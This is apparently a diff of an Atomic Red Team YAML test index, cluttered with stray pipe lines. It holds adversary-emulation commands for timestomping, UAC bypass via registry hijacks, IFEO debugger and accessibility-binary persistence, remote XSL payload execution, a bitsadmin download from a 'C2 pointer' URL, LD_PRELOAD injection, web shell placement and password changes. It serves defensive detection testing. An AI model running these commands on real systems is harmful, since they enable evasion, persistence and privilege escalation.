|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Set a file's creation timestamp
|
|
|
|
|
description: |
|
|
|
|
|
Stomps on the create timestamp of a file
|
|
|
|
@@ -12500,83 +12499,106 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'touch -acmr #{reference_file_path} #{target_file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Modify file creation timestamp with PowerShell
|
|
|
|
|
description: |
|
|
|
|
|
Modifies the file creation timestamp of a specified file.
|
|
|
|
|
|
|
|
|
|
This technique was seen in use by the Stitch RAT.
|
|
|
|
|
Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT.
|
|
|
|
|
To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_path:
|
|
|
|
|
description: Path of file to change creation timestamp
|
|
|
|
|
type: Path
|
|
|
|
|
default: "$env:APPDATA\\atomic.txt"
|
|
|
|
|
default: "$env:TEMP\\T1099_timestomp.txt"
|
|
|
|
|
target_date_time:
|
|
|
|
|
description: Date/time to replace original timestamps with
|
|
|
|
|
type: String
|
|
|
|
|
default: '1970-01-01 00:00:00'
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: A file must exist at the path (#{file_path}) to change the creation
|
|
|
|
|
time on
|
|
|
|
|
prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}'
|
|
|
|
|
get_prereq_command: |-
|
|
|
|
|
New-Item -Path #{file_path} -Force | Out-Null
|
|
|
|
|
Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
New-Item #{file_path} -Force
|
|
|
|
|
Set-Content #{file_path} -Value "atomic test" -Force
|
|
|
|
|
Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" }
|
|
|
|
|
cleanup_command: 'Remove-Item #{file_path} -Force
|
|
|
|
|
command: 'Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}"
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Modify file last modified timestamp with PowerShell
|
|
|
|
|
description: |
|
|
|
|
|
Modifies the file last modified timestamp of a specified file.
|
|
|
|
|
|
|
|
|
|
This technique was seen in use by the Stitch RAT.
|
|
|
|
|
Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT.
|
|
|
|
|
To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_path:
|
|
|
|
|
description: Path of file to change last modified timestamp
|
|
|
|
|
description: Path of file to change modified timestamp
|
|
|
|
|
type: Path
|
|
|
|
|
default: "$env:APPDATA\\atomic.txt"
|
|
|
|
|
default: "$env:TEMP\\T1099_timestomp.txt"
|
|
|
|
|
target_date_time:
|
|
|
|
|
description: Date/time to replace original timestamps with
|
|
|
|
|
type: String
|
|
|
|
|
default: '1970-01-01 00:00:00'
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: A file must exist at the path (#{file_path}) to change the modified
|
|
|
|
|
time on
|
|
|
|
|
prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}'
|
|
|
|
|
get_prereq_command: |-
|
|
|
|
|
New-Item -Path #{file_path} -Force | Out-Null
|
|
|
|
|
Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
New-Item #{file_path} -Force
|
|
|
|
|
Set-Content #{file_path} -Value "atomic test" -Force
|
|
|
|
|
Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" }
|
|
|
|
|
cleanup_command: 'Remove-Item #{file_path} -Force
|
|
|
|
|
command: 'Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}"
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Modify file last access timestamp with PowerShell
|
|
|
|
|
description: |
|
|
|
|
|
Modifies the last access timestamp of a specified file.
|
|
|
|
|
|
|
|
|
|
This technique was seen in use by the Stitch RAT.
|
|
|
|
|
Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT.
|
|
|
|
|
To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_path:
|
|
|
|
|
description: Path of file to change last access timestamp
|
|
|
|
|
type: Path
|
|
|
|
|
default: "$env:APPDATA\\atomic.txt"
|
|
|
|
|
default: "$env:TEMP\\T1099_timestomp.txt"
|
|
|
|
|
target_date_time:
|
|
|
|
|
description: Date/time to replace original timestamps with
|
|
|
|
|
type: String
|
|
|
|
|
default: '1970-01-01 00:00:00'
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: A file must exist at the path (#{file_path}) to change the last
|
|
|
|
|
access time on
|
|
|
|
|
prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}'
|
|
|
|
|
get_prereq_command: |-
|
|
|
|
|
New-Item -Path #{file_path} -Force | Out-Null
|
|
|
|
|
Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
New-Item #{file_path} -Force
|
|
|
|
|
Set-Content #{file_path} -Value "atomic test" -Force
|
|
|
|
|
Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" }
|
|
|
|
|
cleanup_command: 'Remove-Item #{file_path} -Force'
|
|
|
|
|
command: 'Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}"
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
T1127:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -12709,7 +12731,7 @@ defense-evasion:
|
|
|
|
|
- name: MSBuild Bypass Using Inline Tasks
|
|
|
|
|
description: 'Executes the code in a project file using. C# Example
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12729,7 +12751,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1102:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -12796,7 +12818,7 @@ defense-evasion:
|
|
|
|
|
- name: Reach out to C2 Pointer URLs via command_prompt
|
|
|
|
|
description: 'Download data from a public website using command line
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -12805,14 +12827,14 @@ defense-evasion:
|
|
|
|
|
command: 'bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/
|
|
|
|
|
%TEMP%\bitsadmindownload.html
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del %TEMP%\bitsadmindownload.html >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Reach out to C2 Pointer URLs via powershell
|
|
|
|
|
description: 'Multiple download methods for files using powershell
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -12917,9 +12939,10 @@ defense-evasion:
|
|
|
|
|
- name: MSXSL Bypass using local files
|
|
|
|
|
description: 'Executes the code specified within a XSL script tag during XSL
|
|
|
|
|
transformation using a local payload. Requires download of MSXSL from Microsoft
|
|
|
|
|
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
|
|
|
|
|
at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe
|
|
|
|
|
when test sucessfully executed, while AV turned off.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12947,13 +12970,14 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: MSXSL Bypass using remote files
|
|
|
|
|
description: 'Executes the code specified within a XSL script tag during XSL
|
|
|
|
|
transformation using a remote payload. Requires download of MSXSL from Microsoft
|
|
|
|
|
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
|
|
|
|
|
at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe
|
|
|
|
|
when test sucessfully executed, while AV turned off.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12969,12 +12993,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMIC bypass using local XSL file
|
|
|
|
|
description: 'Executes the code specified within a XSL script using a local
|
|
|
|
|
payload.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12995,14 +13019,15 @@ defense-evasion:
|
|
|
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}"
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}
|
|
|
|
|
command: 'wmic #{wmic_command} /FORMAT:"#{local_xsl_file}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMIC bypass using remote XSL file
|
|
|
|
|
description: 'Executes the code specified within a XSL script using a remote
|
|
|
|
|
payload.
|
|
|
|
|
payload. Open Calculator.exe when test sucessfully executed, while AV turned
|
|
|
|
|
off.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -13016,9 +13041,9 @@ defense-evasion:
|
|
|
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
|
|
|
|
|
command: 'wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
privilege-escalation:
|
|
|
|
|
'':
|
|
|
|
|
technique:
|
|
|
|
@@ -13228,7 +13253,7 @@ privilege-escalation:
|
|
|
|
|
description: 'Comma separated list of system binaries to which you want
|
|
|
|
|
to attach each #{attached_process}. Default: "osk.exe"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
type: String
|
|
|
|
|
default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
|
|
|
|
|
atbroker.exe
|
|
|
|
@@ -13236,7 +13261,7 @@ privilege-escalation:
|
|
|
|
|
description: 'Full path to process to attach to target in #{parent_list}.
|
|
|
|
|
Default: cmd.exe
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
type: Path
|
|
|
|
|
default: C:\windows\system32\cmd.exe
|
|
|
|
|
executor:
|
|
|
|
@@ -13330,7 +13355,7 @@ privilege-escalation:
|
|
|
|
|
description: 'AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs
|
|
|
|
|
to be loaded into each user mode process on the system
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -13343,7 +13368,7 @@ privilege-escalation:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'reg.exe import #{registry_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1138:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -13422,11 +13447,8 @@ privilege-escalation:
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Application Shim Installation
|
|
|
|
|
description: |
|
|
|
|
|
To test injecting DLL into a custom application
|
|
|
|
|
you need to copy AtomicShim.dll Into C:\Tools
|
|
|
|
|
As well as Compile the custom app.
|
|
|
|
|
We believe observing the shim install is a good
|
|
|
|
|
place to start.
|
|
|
|
|
Install a shim database. This technique is used for privelage escalation and bypassing user access control. Upon execution, "Installation of AtomicShim complete."
|
|
|
|
|
will be displayed.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -13444,13 +13466,17 @@ privilege-escalation:
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: |
|
|
|
|
|
sdbinst.exe #{file_path}
|
|
|
|
|
sdbinst.exe -u #{file_path}
|
|
|
|
|
- name: New shim database files created in the default shim database directory
|
|
|
|
|
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
|
|
|
|
|
command: 'sdbinst.exe #{file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'sdbinst.exe -u #{file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: New shim database files created in the default shim database directory
|
|
|
|
|
description: |
|
|
|
|
|
Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database
|
|
|
|
|
|
|
|
|
|
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -13463,9 +13489,11 @@ privilege-escalation:
|
|
|
|
|
Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb -ErrorAction Ignore
|
|
|
|
|
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb -ErrorAction Ignore
|
|
|
|
|
- name: Registry key creation and/or modification events for SDB
|
|
|
|
|
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
|
|
|
|
|
description: |
|
|
|
|
|
Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing
|
|
|
|
|
the registry keys that were created. These keys can also be viewed using the Registry Editor.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -13592,7 +13620,7 @@ privilege-escalation:
|
|
|
|
|
cmd.exe /c eventvwr.msc
|
|
|
|
|
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC using Event Viewer (PowerShell)
|
|
|
|
|
description: |
|
|
|
|
|
PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
|
|
|
|
@@ -13613,12 +13641,12 @@ privilege-escalation:
|
|
|
|
|
cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
|
|
|
|
|
-ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC using Fodhelper
|
|
|
|
|
description: 'Bypasses User Account Control using the Windows 10 Features on
|
|
|
|
|
Demand Helper (fodhelper.exe). Requires Windows 10.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -13635,12 +13663,12 @@ privilege-escalation:
|
|
|
|
|
fodhelper.exe
|
|
|
|
|
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC using Fodhelper - PowerShell
|
|
|
|
|
description: 'PowerShell code to bypass User Account Control using the Windows
|
|
|
|
|
10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -13659,7 +13687,7 @@ privilege-escalation:
|
|
|
|
|
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
|
|
|
|
|
-Recurse -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC using ComputerDefaults (PowerShell)
|
|
|
|
|
description: |
|
|
|
|
|
PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10
|
|
|
|
@@ -13682,7 +13710,7 @@ privilege-escalation:
|
|
|
|
|
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
|
|
|
|
|
-Recurse -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC by Mocking Trusted Directories
|
|
|
|
|
description: |
|
|
|
|
|
Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems
|
|
|
|
@@ -13877,7 +13905,7 @@ privilege-escalation:
|
|
|
|
|
description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor)
|
|
|
|
|
daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -14109,7 +14137,7 @@ privilege-escalation:
|
|
|
|
|
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
|
|
|
|
|
description: 'Hooks functions in PowerShell to read TLS Communications
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -14223,7 +14251,7 @@ privilege-escalation:
|
|
|
|
|
- name: IFEO Add Debugger
|
|
|
|
|
description: 'Leverage Global Flags Settings
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -14241,15 +14269,15 @@ privilege-escalation:
|
|
|
|
|
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
|
|
|
|
|
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
|
|
|
|
|
File Execution Options\#{target_binary}" /v Debugger /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: IFEO Global Flags
|
|
|
|
|
description: 'Leverage Global Flags Settings
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -14341,7 +14369,7 @@ privilege-escalation:
|
|
|
|
|
- name: Launch Daemon
|
|
|
|
|
description: 'Utilize LaunchDaemon to launch `Hello World`
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -14679,7 +14707,7 @@ privilege-escalation:
|
|
|
|
|
- name: Plist Modification
|
|
|
|
|
description: 'Modify MacOS plist file in one of two directories
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -14772,7 +14800,7 @@ privilege-escalation:
|
|
|
|
|
description: 'Appends a start process cmdlet to the current user''s powershell
|
|
|
|
|
profile pofile that points to a malicious executable
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -14999,7 +15027,7 @@ privilege-escalation:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'echo #{path_to_shared_library} > /etc/ld.so.preload
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Shared Library Injection via LD_PRELOAD
|
|
|
|
|
description: |
|
|
|
|
|
This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
|
|
|
|
@@ -15017,7 +15045,7 @@ privilege-escalation:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'LD_PRELOAD=#{path_to_shared_library} ls
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Process Injection via C#
|
|
|
|
|
description: |
|
|
|
|
|
Process Injection using C#
|
|
|
|
@@ -15158,7 +15186,7 @@ privilege-escalation:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'at 13:20 /interactive cmd
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Scheduled task Local
|
|
|
|
|
description: "Upon successful execution, cmd.exe will create a scheduled task
|
|
|
|
|
to spawn cmd.exe at 20:10. \n"
|
|
|
|
@@ -15178,10 +15206,10 @@ privilege-escalation:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'SCHTASKS /Delete /TN spawn /F
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Scheduled task Remote
|
|
|
|
|
description: "Create a task on a remote system.\n\nUpon successful execution,
|
|
|
|
|
cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote
|
|
|
|
@@ -15215,10 +15243,10 @@ privilege-escalation:
|
|
|
|
|
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
|
|
|
|
|
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powershell Cmdlet Scheduled Task
|
|
|
|
|
description: "Create an atomic scheduled task that leverages native powershell
|
|
|
|
|
cmdlets.\n\nUpon successful execution, powershell.exe will create a scheduled
|
|
|
|
@@ -15238,7 +15266,7 @@ privilege-escalation:
|
|
|
|
|
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
|
|
|
|
|
>$null 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1058:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -15378,7 +15406,7 @@ privilege-escalation:
|
|
|
|
|
description: 'Make, change owner, and change file attributes on a C source code
|
|
|
|
|
file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -15404,7 +15432,7 @@ privilege-escalation:
|
|
|
|
|
- name: Set a SetUID flag on file
|
|
|
|
|
description: 'This test sets the SetUID flag on a file in Linux and macOS.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -15422,11 +15450,11 @@ privilege-escalation:
|
|
|
|
|
sudo chmod u+s #{file_to_setuid}
|
|
|
|
|
cleanup_command: 'sudo rm #{file_to_setuid}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Set a SetGID flag on file
|
|
|
|
|
description: 'This test sets the SetGID flag on a file in Linux and macOS.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -15444,7 +15472,7 @@ privilege-escalation:
|
|
|
|
|
sudo chmod g+s #{file_to_setuid}
|
|
|
|
|
cleanup_command: 'sudo rm #{file_to_setuid}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1165:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -15516,10 +15544,10 @@ privilege-escalation:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'sudo touch /Library/StartupItems/EvilStartup.plist
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1169:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -15569,7 +15597,7 @@ privilege-escalation:
|
|
|
|
|
- name: Sudo usage
|
|
|
|
|
description: 'Common Sudo enumeration methods.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -15650,7 +15678,7 @@ privilege-escalation:
|
|
|
|
|
This is dangerous to modify without using ''visudo'', do not do this on a
|
|
|
|
|
production system.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -15663,7 +15691,7 @@ privilege-escalation:
|
|
|
|
|
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
|
|
|
|
|
to modify without using ''visudo'', do not do this on a production system.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -15760,10 +15788,10 @@ privilege-escalation:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'xcopy #{web_shells} #{web_shell_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del #{web_shell_path} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
impact:
|
|
|
|
|
T1531:
|
|
|
|
|
technique:
|
|
|
|
@@ -15825,7 +15853,7 @@ impact:
|
|
|
|
|
description: 'Changes the user password to hinder access attempts. Seen in use
|
|
|
|
|
by LockerGoga.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -15850,14 +15878,14 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'net.exe user #{user_account} #{new_password}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'net.exe user #{user_account} /delete
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Delete User - Windows
|
|
|
|
|
description: 'Deletes a user account to prevent access.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
